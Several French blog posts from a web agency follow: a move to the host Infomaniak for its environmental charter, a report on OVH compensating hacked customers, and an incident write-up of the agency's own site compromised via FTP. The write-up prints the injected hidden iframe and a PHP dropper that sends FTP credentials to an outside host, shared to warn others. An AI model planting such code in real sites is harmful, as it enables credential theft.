Sans s’attarder sur les motifs qui nous ont fait changer d’hébergeur, voici donc venu le temps des rires et des chants auprès d’Infomaniak Network.

A nous les vertes prairies des alpages suisses puisque, raison qui a particulièrement retenue notre attention, Infomaniak applique (et communique !) une charte écologique auprès de ses postes-serveurs, de ses locaux, de la gestion énergétique, des déchets et des engagements vis-à-vis de ses salariés sur leur mode de transport par exemple ! Si vous êtes intéressé, sensible, curieux, ou tout à la fois, voici le détail de la charte environnementale d’Infomaniak.

Cette démarche écologique correspond parfaitement à notre mentalité et à nos exigences : il est donc tout à fait logique que, se l’appliquant à nous-même, nous le demandons également à nos fournisseurs ! Et cela commence par notre hébergeur.

Faisant suite à mon article « Site hacké craqué« , une information confirme nos doutes concernant la vague d’attaques touchant depuis mai 2008 certains hébergeurs, dont OVH. Ces derniers démentaient plus ou moins l’information quand nous l’évoquions avec eux, la hotline préférant nous orienter vers notre incapacité professionnelle ou nos manques de mises à jour sur les CMS… Force est de constater que le dédommagement sonnant et trébuchant de certains sites piratés prouve le contraire !

L’info du 28 août 2008 a été découverte par Didier Rocton, ce matin sur le site de Zataz : « OVH rend 150.000 euros à des personnes piratées« . La piste la plus probable qui pouvait expliquer l’usurpation des identifiants ftp y est évoquée :

(…) la victime est observée en temps réel par les pirates qui enregistrent les informations de l’ordinateur piégé. L’exploitation d’un cheval de Troie et d’un Keylogueur semble être les outils de prédilections de ces pirates. « Une fois que la victime est couché, indique OVH, le hackeur reprend la connexion VNC pour usurper son identité en passant par le propre PC de la victime et en passant les commandes de … serveurs dédiés ou/et des hébergements mutualisés dans le but de voler les cartes bancaires … Ainsi de suite. »

Les autres explications fournies par OVH ne sont pas trés claires. Ce qui est certain c’est que les règles de sécurité ont été modifiées mais non communiquées auprès des clients : nous en avons fait l’amer constat par une plainte d’un de nos client dont le service e-marchand ne fonctionnait soudainement plus !

Comme quoi : nos doutes et nos questions sans réponse justifiaient plutôt notre compétence et notre expérience professionnelle !

NB : je précise que nous n’en voulons pas particulièrement à OVH puisque l’attaque massive a touché d’autres hébergeurs et d’autres sites sans CMS. Simplement, devant les explications fournies il est bon de rétablir l’équilibre : nos clients apprécient, eux, ce genre d’explication !

Découvert il y a quelques jours, un de nos sites a été violé par un hacker qui s’est gentillement introduit sur le FTP. Les motifs ou l’origine n’ayant toujours aucune explication, il est bon de détailler ici la méthode de crack afin de diffuser l’information.

L’auteur (sûrement un robot puisque selon les logs l’opération s’effectue en 9 secondes !) installe dans le fichier d’index principal (.html, .php ou autre) dès la première ligne l’entête suivant :
<iframe style="width:0px; height:0px; border: 0px" src="UPLDR\gogo.php"></iframe>

Parallèlement il crée un répertoire UPLDR/ contenant deux fichiers : « already.sent » et « gogo.php ». Ce dernier contient :
<?
$ftp_name ="ftp://monlogin_ftp:monmotdepasse_ftp <at> ftp.monadressedomaine.com";
$remote_host = "http://alojados.com/images/put.php";
if (file_exists("already.sent"))
{
exit(0);
} else
{
$fp = fopen("already.sent", "w");
fclose($fp);
}
?>
<html><head><meta http-equiv="Refresh" content="0;url=<?echo
$remote_host."?srv=".$_SERVER['SERVER_NAME']."&ftp=".$ftp_name;?>"></head>

Malin ! Le véritable travail s’effectue sur le fameux fichier distant « put.php » permettant de naviguer tranquillement sur le FTP du site puisque les accès log/pass sont récupérés.

La recherche du propriétaire du domaine nous conduit à Séville en Espagne. Mais vue l’ampleur de l’attaque, puisque de nombreux sites français et allemands ont été également touchés depuis le 21 juin 2008, je pense que les informations trouvées si facilement cache un hacking plus ambitieux que l’unique fait d’un ‘petit cracker qui s’amuse’…

La question à résoudre est : comment les accès FTP ont pu être dérobés ?
Constats communs aux sites victimes :

• ils ont été développés avec des CMS différents et de versions différentes ;
• certains n’ont pas de CMS : ainsi le notre n’est qu’une page html appelant un swf via SWFobject ;
• ils sont parfois administrés par des logiciels FTP (type Filezilla, voire DreamWeaver), parfois directement administrés en FTP depuis un navigateur web ;
• ils ont des hébergeurs différents avec des services d’hébergement différents ;
• les accès ftp ont pour certains été échangés en interne par mail, d’autre jamais !

Alerté, de notre côté un contact technique chez OVH n’a pas trouvé d’autres réponses que : « vous devez mettre à jour votre CMS ! ». Point final de l’échange possible = no comment !

Si vous avez vécu ou vivez la même expérience, si vous avez plus d’explication sur le schmilblick, n’hésitez pas à intervenir ou à prendre contact directement avec nous.